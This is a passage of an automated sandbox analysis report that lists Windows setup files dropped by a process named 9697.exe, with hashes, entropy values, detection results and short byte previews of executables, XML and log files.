                                                                                                                                                                                                              C:\$Windows.~WS\Sources\Panther\setuperr.log
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):622
                                                                                                                                                                                                              Entropy (8bit):4.970071562147781
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:sqJFOvopqJV91PYeiZRqtm5qJV9la1koZqJV9HfsLqJV9jH/Nuik:P+og1hiLqcQw6ow/sajDk
                                                                                                                                                                                                              MD5:57C73F386E66D4E1608183A0A3B2E0D4
                                                                                                                                                                                                              SHA1:50D5DC785991922738D7AF97DFE4BD04299BA420
                                                                                                                                                                                                              SHA-256:0A294471FDA3791BF23747136B531E2F5D552B56FCFE2F216574DDBA68F8BF01
                                                                                                                                                                                                              SHA-512:0D5645070469BAD2BD748FA4E4FC0784142C1442C7CAF487A2C814538F9C5C294FCBA94EC21341BEB72E973F00FFDF90730A473A5E4EC3454433EEC6D192421F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .2021-05-12 15:16:23, Error MOUPG CInstallUI::GetDefaultLanguage(2027): Result = 0x80070002[gle=0x00000002]..2021-05-12 15:23:25, Error MOUPG CMoSetupOneSettingsHelperT<class CEmptyType>::InitializeSettings(324): Result = 0x80072EFE[gle=0x00002efe]..2021-05-12 15:23:25, Error MOUPG CSetupHost::InitializeOneSettings(1341): Result = 0x80072EFE..2021-05-12 15:23:25, Error MOUPG SetupHost: OneSettings initialization failed: [0x80072EFE]..2021-05-12 15:23:25, Error MOUPG CSystemHelper::CheckConnectedStandby(642): Result = 0x80070057..
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\Panther\windlp.state-old.xml
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):130556
                                                                                                                                                                                                              Entropy (8bit):3.5842269109304055
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:SXXZXXNf4XXNf4XXNf4XXNf4XXNf4XXNf4OXNfW5B8OXCfy85B8OXCfy85B8OXCW:o
                                                                                                                                                                                                              MD5:AE566501C2F4EB0C68CD2A6F6C612090
                                                                                                                                                                                                              SHA1:6CFB40BF8BC41955DEC9E623D72BE1DB7BEE28C9
                                                                                                                                                                                                              SHA-256:45F7215C0ED0D0080F10842FF1C7E2F94838E332CC14C08C99375C0C93E283FF
                                                                                                                                                                                                              SHA-512:DF2C469B26EBB2ADECCE2993D37D5B84DD43183CC130DB90B6F52AEC1E6EC0EC7578E7F2F9B95E77B508B497E2CC1CDDC7E89021C5EE52E4CE6B64688A017847
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ..<.W.I.N.D.L.P.>..... . .<.S.t.a.t.e.>.0.<./.S.t.a.t.e.>..... . .<.T.a.s.k.C.o.u.n.t.>.0.<./.T.a.s.k.C.o.u.n.t.>..... . .<.W.o.r.k.i.n.g.P.a.t.h.>.C.:.\.$.W.i.n.d.o.w.s...~.W.S.\.S.o.u.r.c.e.s.\.P.a.n.t.h.e.r.<./.W.o.r.k.i.n.g.P.a.t.h.>..... . .<.S.t.r.i.n.g.C.o.u.n.t.>.0.<./.S.t.r.i.n.g.C.o.u.n.t.>..... . .<.D.w.o.r.d.C.o.u.n.t.>.0.<./.D.w.o.r.d.C.o.u.n.t.>..... . .<.Q.u.a.d.w.o.r.d.C.o.u.n.t.>.0.<./.Q.u.a.d.w.o.r.d.C.o.u.n.t.>.....<./.W.I.N.D.L.P.>.......<.W.I.N.D.L.P.>..... . .<.S.t.a.t.e.>.0.<./.S.t.a.t.e.>..... . .<.T.a.s.k.C.o.u.n.t.>.0.<./.T.a.s.k.C.o.u.n.t.>..... . .<.W.o.r.k.i.n.g.P.a.t.h.>.C.:.\.$.W.i.n.d.o.w.s...~.W.S.\.S.o.u.r.c.e.s.\.P.a.n.t.h.e.r.<./.W.o.r.k.i.n.g.P.a.t.h.>..... . .<.S.t.r.i.n.g.C.o.u.n.t.>.2.<./.S.t.r.i.n.g.C.o.u.n.t.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.u.I.d.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.1.b.2.0.8.7.4.b.-.d.6.9.c.-.4.c.c.c.-.8.3.c.9.-.7.f.8.6.7.d.d.a.b.a.2.5.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\Panther\windlp.state.xml
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):130556
                                                                                                                                                                                                              Entropy (8bit):3.5842269109304055
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:SXXZXXNf4XXNf4XXNf4XXNf4XXNf4XXNf4OXNfW5B8OXCfy85B8OXCfy85B8OXCW:o
                                                                                                                                                                                                              MD5:AE566501C2F4EB0C68CD2A6F6C612090
                                                                                                                                                                                                              SHA1:6CFB40BF8BC41955DEC9E623D72BE1DB7BEE28C9
                                                                                                                                                                                                              SHA-256:45F7215C0ED0D0080F10842FF1C7E2F94838E332CC14C08C99375C0C93E283FF
                                                                                                                                                                                                              SHA-512:DF2C469B26EBB2ADECCE2993D37D5B84DD43183CC130DB90B6F52AEC1E6EC0EC7578E7F2F9B95E77B508B497E2CC1CDDC7E89021C5EE52E4CE6B64688A017847
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ..<.W.I.N.D.L.P.>..... . .<.S.t.a.t.e.>.0.<./.S.t.a.t.e.>..... . .<.T.a.s.k.C.o.u.n.t.>.0.<./.T.a.s.k.C.o.u.n.t.>..... . .<.W.o.r.k.i.n.g.P.a.t.h.>.C.:.\.$.W.i.n.d.o.w.s...~.W.S.\.S.o.u.r.c.e.s.\.P.a.n.t.h.e.r.<./.W.o.r.k.i.n.g.P.a.t.h.>..... . .<.S.t.r.i.n.g.C.o.u.n.t.>.0.<./.S.t.r.i.n.g.C.o.u.n.t.>..... . .<.D.w.o.r.d.C.o.u.n.t.>.0.<./.D.w.o.r.d.C.o.u.n.t.>..... . .<.Q.u.a.d.w.o.r.d.C.o.u.n.t.>.0.<./.Q.u.a.d.w.o.r.d.C.o.u.n.t.>.....<./.W.I.N.D.L.P.>.......<.W.I.N.D.L.P.>..... . .<.S.t.a.t.e.>.0.<./.S.t.a.t.e.>..... . .<.T.a.s.k.C.o.u.n.t.>.0.<./.T.a.s.k.C.o.u.n.t.>..... . .<.W.o.r.k.i.n.g.P.a.t.h.>.C.:.\.$.W.i.n.d.o.w.s...~.W.S.\.S.o.u.r.c.e.s.\.P.a.n.t.h.e.r.<./.W.o.r.k.i.n.g.P.a.t.h.>..... . .<.S.t.r.i.n.g.C.o.u.n.t.>.2.<./.S.t.r.i.n.g.C.o.u.n.t.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.u.I.d.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.1.b.2.0.8.7.4.b.-.d.6.9.c.-.4.c.c.c.-.8.3.c.9.-.7.f.8.6.7.d.d.a.b.a.2.5.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\SetupCore.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2172728
                                                                                                                                                                                                              Entropy (8bit):5.943926965774228
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:OeEbcHPcrJLItSNvtuu/YhSef7K/cjkXgaoo0NGG2Adj9DDIE/RYw:OVb2cRwyY4VXXEL2GjBIQYw
                                                                                                                                                                                                              MD5:55A4344E76136460BE2C8547C38567B4
                                                                                                                                                                                                              SHA1:83400B9A3BC4F1D935258A80B3E7636BAAA618CB
                                                                                                                                                                                                              SHA-256:A9AC64EC515D04589DFC38B25D68D01F281BBB794D0DF9EC4205FE473703AEF5
                                                                                                                                                                                                              SHA-512:A8AD61CAF69891EE31C48401EC87D3BB92DB5E64C9FE878EE33E072FD6E5406DB9A747485D1CF93F615072E6C565C36715700571DCD974C6EB7A76A7630D0F43
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.S.x.=.x.=.x.=.l.>.s.=.l.9.i.=.x.<.;.=.l.<.[.=.l.8.q.=.l.=.y.=.l.4.m.=.l...y.=.l.?.y.=.Richx.=.........................PE..L....7t\...........-.........R...............................................@!......o!...@A...........................R....6..h....p..X.............!.8!...@ .d.......T...................|..........@............0...............................text...B........................... ..`.data....e.......V..................@....idata...0...0...2..................@..@.rsrc........p.......<..............@..@.reloc..d....@ ....... .............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):699192
                                                                                                                                                                                                              Entropy (8bit):6.488335450528499
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:aoBJUei8NJTRJUrJJMOy2pWShbJAnpRj5pcRpGbov5IUfiHrCOTmfVjRagSPD:jBJUj8NJTRJUVJN59VjwbPD
                                                                                                                                                                                                              MD5:A5D94F9587F97E9C674447447721B77F
                                                                                                                                                                                                              SHA1:1C130F95C82AB28A4A11A7ED41EB9EA9F613A339
                                                                                                                                                                                                              SHA-256:F33E7BCE0CA712BAAC95557823096F929F78927E521C0448ED237F429141EFD9
                                                                                                                                                                                                              SHA-512:E5E35480A489B0F63A2938A1C4EA19ACA197A16020BB330662B62E98759FB5F7B6056416DC1D8894E433607C5B4FB3E7AE61F0D2FA3C7455DD000916EC3D5D62
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........bn.............h.......h.......h.......h..........{....h..)....h.......h......Rich............................PE..L.....\e................. ..........P........0....@.................................<.....@...... .......................... v..,.......H...............8!...p..|e.. ...T....................2.......1..@............p...............................text............ .................. ..`.data....?...0.......$..............@....idata...)...p...*...2..............@..@.rsrc...H............\..............@..@.reloc..|e...p...f...$..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\SetupMgr.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):747320
                                                                                                                                                                                                              Entropy (8bit):6.582241479326702
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:yMv8NZ0L0YEgAt2dBVtnliFAAF02WPy6e5W7JrAa3vpz/VXGGT3m/YvZ0YPej/O8:yMv6q0YEgAt2RtnliFAW0jPG5wXJSDjf
                                                                                                                                                                                                              MD5:59D1A173F6B27A8A1CC367CA9FF6E560
                                                                                                                                                                                                              SHA1:15B2C60011D97B99C4CD2EEDB62CCAB14D748DF6
                                                                                                                                                                                                              SHA-256:45C2EE2387026A50F0C6B9C9119F39B6D2B6505312DBDF352399FD41E8DEB78F
                                                                                                                                                                                                              SHA-512:A14D89FCF4964F7929936A16C0EF9D4896D14913B3E5BC050CD7044A1A0DA50E58520DE80A7966832F514365D031012D0E1829CD7B93D1B547812F8ABBCF7557
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M6..,X\.,X\.,X\.D[].,X\.G[].,X\.G\].,X\.,Y\*-X\.GY].,X\.G]].,X\.GX].,X\.GQ].,X\.G.\.,X\.GZ].,X\Rich.,X\........................PE..L....B.............-................@+...............................................{....@A............................Q.......@....0...............F..8!...@...f......T...............................@............................................text.............................. ..`.data...(P..........................@....idata..x........ ..................@..@.rsrc........0......................@..@.reloc...f...@...h..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\WinDlp.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1165624
                                                                                                                                                                                                              Entropy (8bit):6.458049440050692
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:sHChbi7VH3Cg3G49W4qjbuK5nwTShiPGm/ap:Bhbi7VHSCGF7wTDOzp
                                                                                                                                                                                                              MD5:6F12BA2D5CB564F73D9813D105E5C1FE
                                                                                                                                                                                                              SHA1:B634E34149F99F4336EFC0C5DE5E850C61BE48E1
                                                                                                                                                                                                              SHA-256:26B66B81267DFDA7A78890F20A4ED0D104DB1CD350D2D9F649FDB496B6C11333
                                                                                                                                                                                                              SHA-512:4462F38B0A4ECA1D09EB747853CC15C804E2E42E91812604A0AEF25DE06D5FA5A5A4D79731AEB462F61ED46D63DD904D0A943919AABD5ADB771F94C63E6A175A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......mu..)...)...)...r|..(...=...-...=...&...=...#...).......=...6...=...(...=.......=...(...=...(...Rich)...........................PE..L..................-................................................................8.....@A...........................}...h...,.......LC..............8!...@..H... ...T............................8..@...............d............................text...M........................... ..`.data...............................@....idata...+.......,..................@..@.rsrc....P.......D..................@..@.reloc..H....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\pidgenx.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):888632
                                                                                                                                                                                                              Entropy (8bit):6.878236449249567
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:snR+vEwcJsaaiaYZC1vLDQf8vdJy+X1LQpOd+:4zw7aaiaYZCj5vdJy+XhUOd+
                                                                                                                                                                                                              MD5:A54F45A9013251F0DDD91C6B3AB18449
                                                                                                                                                                                                              SHA1:D2AF46EEDBF3E5024F54D81CD062F8AA4C9B77D8
                                                                                                                                                                                                              SHA-256:40A97484CE8E06658EA02AF3E3B0077C47BA8D71C2D991EB69B94F221C78478F
                                                                                                                                                                                                              SHA-512:02C4784F02537247134EA17B508CBD3E5B0C6CEA943EF0143EC9708652C85C255E115A603EB337E515AB00FE6526CD5D83D560D987FFE7D1BA612A6F125AD62D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G.g.&.4.&.4.&.4.N.5.&.4.M.5.&.4.&.4.&.4.M.5.&.4.M.5.&.4.M.5.&.4.M.5.&.4.M.5.&.4.M.4.&.4.M.5.&.4Rich.&.4................PE..L...w..............!................P...........................CS P.....................@A........................p...s.......x....................n..8!... ..hy......T....................5......`4..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc..hy... ...z..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\pkeyconfig.xrm-ms
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):582696
                                                                                                                                                                                                              Entropy (8bit):5.715631293469523
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:GeUJmDlHwVeCx2qTMTTnaP/d5/NbyBNiX4OOqd:GfARHwVeCx2qTMTTnaP/d5/NfJ
                                                                                                                                                                                                              MD5:7D72243366184B4048A90AF77D63F21C
                                                                                                                                                                                                              SHA1:4D1A0CB9CC75B1AC7DBEC285DA7B90FBC85B3892
                                                                                                                                                                                                              SHA-256:A3471EB8DC2C3045E33EB48ABAEF4046EEEBBE30161A52F7056F68E479400823
                                                                                                                                                                                                              SHA-512:A223ABBD4C3D3CDC6C1FE345E68613E0225B583D7C8705A89B3A9F91DEC96EC20428066830147642816B6B6628C7DEF368E89CC91D2378AA001CAB9E3BEE71F3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .<?xml version="1.0" encoding="utf-8"?><rg:licenseGroup xmlns:rg="urn:mpeg:mpeg21:2003:01-REL-R-NS"><r:license xmlns:r="urn:mpeg:mpeg21:2003:01-REL-R-NS" licenseId="{06a4dd30-84b7-4fd2-b859-f1eddb0858f5}" xmlns:sx="urn:mpeg:mpeg21:2003:01-REL-SX-NS" xmlns:mx="urn:mpeg:mpeg21:2003:01-REL-MX-NS" xmlns:sl="http://www.microsoft.com/DRM/XrML2/SL/v2" xmlns:tm="http://www.microsoft.com/DRM/XrML2/TM/v2"><r:title>XrML 2.1 License - Product Key Configuration</r:title><r:issuer><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.microsoft.com/xrml/lwc14n"/><SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><Reference><Transforms><Transform Algorithm="urn:mpeg:mpeg21:2003:01-REL-R-NS:licenseTransform"/><Transform Algorithm="http://www.microsoft.com/xrml/lwc14n"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>AM88tJM/7qpuE9kzeYjkyRVvHkQ=</DigestValue></Reference></SignedI
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\products.cab
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 43745 bytes, 1 file
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43745
                                                                                                                                                                                                              Entropy (8bit):7.950193510601175
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:uZR4VfCkLPoYpWBBGZaMH6GPXzXt6+E6p6ED1cy0OAciNNzg0ugm:uZRkfCmMDYzDdCwGy0OAciNHud
                                                                                                                                                                                                              MD5:6ADF0929E3C0FB946B67F0529592D8A6
                                                                                                                                                                                                              SHA1:73A3083D0A250C992E96D90B6966FDB6EA80F936
                                                                                                                                                                                                              SHA-256:D1B89477E41CE09567945EE9E42B14BECFA2ED8F50CAD5A0E2D85A81CD89EF73
                                                                                                                                                                                                              SHA-512:B231C3A6C72CCDA779480C5DF713D56D95D54E9D9569D620B29F9EBB55189B555FF41527B6955D3C1C5B4BF0F612013E31700E47986730CE7B288F819882F626
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MSCF...........,................5..I...V....*........Q.. .products.xml..G......[.......3c@CU...oP.).}.4...|....#.....k.`y.s.-n...6s.O..m.!....b.1./...i..8.....xB....l.......#@@F4....H.y........=.x...`..Ynw+."Vm2..u...[.....6N`.sf..\.9..x........!.8...||.iQ..}.P.'<~...^:.......".3.h(..D..4..<.@...}..#./."}F.,.d@33E3...p.iM...}.c..I%R@Ao}.V".......}.^.{....m+J..)'...W.."[9$n.....IX.D..c..-.....2.$.1.6..s.3w.A.Au.....e.~.oO{.w..../....E._<..?^...o.2....................@.......}....Q.......k......>..<....K.................Oq...sj.>......oww.^....}.....L......{.=.....O.........{...K.{{.....E~x.7...s......U...X.O.....q~n.....c......=}..o........O.'.....}...a.y.......y...G~..o................o||........;..p..>C.\.97l{r.!..7..>........l*_..z.....)\...8sn../.?..+{....S...<...KG...X..c.D...../wKi.....9..y.E......o.q....k_.......G$......V.sw..MY._Hg\..;.!.\...........T..........}...........|#.......g.........~.y.}.m..d~....~..e...32..q...O.......rl..@
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\products.xml
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2788824
                                                                                                                                                                                                              Entropy (8bit):5.16002400144846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:AXbfDEGHrJkmBzlB95g21xrAWKrDPr3aYzf564Efzwt/6Lnu/Uj2DHuA3r4CgdQI:9tM
                                                                                                                                                                                                              MD5:ADCC425E1EF43272C9CF43B0A6F8D029
                                                                                                                                                                                                              SHA1:043AE3B914348B0BE07CFCD8F6BE914D907786C5
                                                                                                                                                                                                              SHA-256:553BC7EACD5CE7F2CD9BED3FF5DDCBE0E45004F7E3916FBB904CADBA05D88AF5
                                                                                                                                                                                                              SHA-512:1E677C68A62325E4E488B6CA75B34998564D3BF9B487EA09E57CC9ABD9D7557E90C53F64460A675F71BED76D32A240266DFB50BE5B3B7748352B86A2D877D750
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: <MCT>.. <Catalogs>.. <Catalog version="1.4.1">.. <PublishedMedia id="" release="">.. <Files>.. <File id="">.. <FileName>19042.631.201119-0144.20h2_release_svc_refresh_CLIENTCHINA_RET_x64FRE_zh-cn.esd</FileName>.. <LanguageCode>zh-cn</LanguageCode>.. <Language>Chinese (Simplified, China)</Language>.. <Edition>CoreCountrySpecific</Edition>.. <Architecture>x64</Architecture>.. <Size>3936938526</Size>.. <Sha1>8977d420927b5c0eb1792c63387b2a9ed1944535</Sha1>.. <FilePath>http://dl.delivery.mp.microsoft.com/filestreamingservice/files/33d85bd3-ab3f-4fc1-95e1-2a6cbe9d589c/19042.631.201119-0144.20h2_release_svc_refresh_CLIENTCHINA_RET_x64FRE_zh-cn.esd</FilePath>.. <Key />.. <Architecture_Loc>%ARCH_64%</Architecture_Loc>.. <Edition_Loc>%BASE_CHINA%</Edition_Loc>.. <IsRetailOnly>False</IsRetailOnly>.. </File>.. <File id="">..
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\setupplatform.cfg
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10452
                                                                                                                                                                                                              Entropy (8bit):5.444136787913199
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:seqadKxSRlb3dY/e7sxzs7c6i19WO7hD26BV+btnQfz/:sjmTrq/e7s1vpMvoz/
                                                                                                                                                                                                              MD5:033E7ADC314C248CC29A9F14906C21E5
                                                                                                                                                                                                              SHA1:6B31F8A23514B4E98217CD05BE08E7967ECA7048
                                                                                                                                                                                                              SHA-256:C40FDDBB16853406D12D30E01E170DE8474728BB8EC24794DB721DE0A7F67927
                                                                                                                                                                                                              SHA-512:46B46D548F5A2269E886A9F6873D97549EEB92C7294114C62BAF7805AC423E4D3AA3A50CD7B3294BE03E22C271F6BEF1134ADF797D9F838962EF5B42E8ECD19E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ;..; This section describes the footprint dependencies..; of various platform sections..;..[Dependencies]..Basic =..Servicing = Basic..ICB = Basic, Servicing..Migration = Basic....;..; Each element in a footprint section can be one of three things:..; - File name: this must not ending in '\'...; - Folder name: this must end in '\'...; - File pattern pattern: these can contain wild cards...; These pattern should be one of the format..; accepted by FindFirstFile()...;......[Footprint.Basic]..diager.dll..diagtrack.dll..diagtrackrunner.exe..reagent.admx..reagent.dll..reagent.xml..setupplatform.cfg..setupplatform.dll..setupplatform.exe..unbcl.dll..wdsclientapi.dll..wdscore.dll..wdscsl.dll..wdsimage.dll..wdstptc.dll..wdsutil.dll..WinSetupBoot.sys..WinSetupBoot.hiv....[Footprint.Basic.Delayed]..*-*\reagent.adml..*-*\reagent.dll.mui..*-*\setupplatform.exe.mui..*-*\wdsimage.dll.mui..du.dll..ReserveManager.dll......[Footprint.Servicing]..dismapi.dll..dismcore.dll..dismcoreps.dll..dis
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\setupplatform.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7203144
                                                                                                                                                                                                              Entropy (8bit):6.701114300776759
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:FsA91crphY6bcvsNZSI/mbuhfuCK4Q4Rus1T+nfIqBpxlpcLy/Wuac7KA2:iA98pSg3ZHLusB+nF1/dS
                                                                                                                                                                                                              MD5:0DB2EB7B159D7289DFBDF3CA29D44704
                                                                                                                                                                                                              SHA1:57A9AA7409A9040A701855BF610F68E5A9CFEA24
                                                                                                                                                                                                              SHA-256:CBEEC25C578F4E8EAE81BB8829C3B7BC81648DA6F63EEB4A606B9A66660D6D91
                                                                                                                                                                                                              SHA-512:8EADA149F0C90DF794D26EFE8AF2C90DF1B8172B33CCC6639F3F1A18671AA34493A6D466B4BF2357075094BC13129E5001623B2388C39ED6FA4239B4E9EF6328
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........& ..GN..GN..GN..?...GN..,M..GN..,J..GN..GO.$BN..,O..GN..,K..GN..,N..GN..,G..EN..,...GN..,L..GN.Rich.GN.........PE..L..................-......^..,........V.......^..............................Pn.......n...@A........................ .^......@d.......d...............m.H!....e..E..0...T...............................@............0d.....`.^.`....................text.....^.......^................. ..`.data....4....^.......^.............@....idata..4....0d.......c.............@..@.didat........d......xd.............@....rsrc.........d......|d.............@..@.reloc...E....e..F....d.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\unbcl.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):835904
                                                                                                                                                                                                              Entropy (8bit):6.6134747845607045
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:tFWowsrRqH5Euwb8naBgOMddILrWER0dDxAbti:tZRqHb1DILrfML
                                                                                                                                                                                                              MD5:5D52A4EFAC5B4B7530B388AEB6F9CB67
                                                                                                                                                                                                              SHA1:4B5D32A6CAECEC6E261F5BA7BAE392609A6A0F65
                                                                                                                                                                                                              SHA-256:137ECA75B268556503E26CD5987DDDAC5EB0831ED4CE5EA3B0D34B5645A31ABD
                                                                                                                                                                                                              SHA-512:F7F88C4229C97BF598F995CF31A8ADFF73089EF8D26143CC839A30D63221FB66B185E12AE20BC17F14712723BB20C34F6E546F6BE961164DEEAE268703322756
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9ys.}...}...}...t`......is..{...is..l...}.......is..p...is..t...is..|...is..)...is.|...is..|...Rich}...........PE..L...c.............-................`...............................................7.....@A........................`...*... ........0..................@!...@..T......T...................TB..........@.......................`....................text............................... ..`.data....^.......Z..................@....idata..............................@..@.didat....... ......................@....rsrc........0......................@..@.reloc..T....@......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\wdsclientapi.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):249288
                                                                                                                                                                                                              Entropy (8bit):6.515585131330681
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:dwSCAMOtf9vjREEQytxZAAB8A866ZAbl3YKcNFsvGbxlVrFJp3qM95BZc61:LWAB8M5bl3YKcgvw1/
                                                                                                                                                                                                              MD5:C8622591EA490127898FF612C4D0FCE8
                                                                                                                                                                                                              SHA1:609B9A81D5CCBCAC62377EEEE95FF328DAEC3618
                                                                                                                                                                                                              SHA-256:00436605B013E26F39B3FF6AAB1E5577FE6E4950C4C803D534D0BBD912B3F7E0
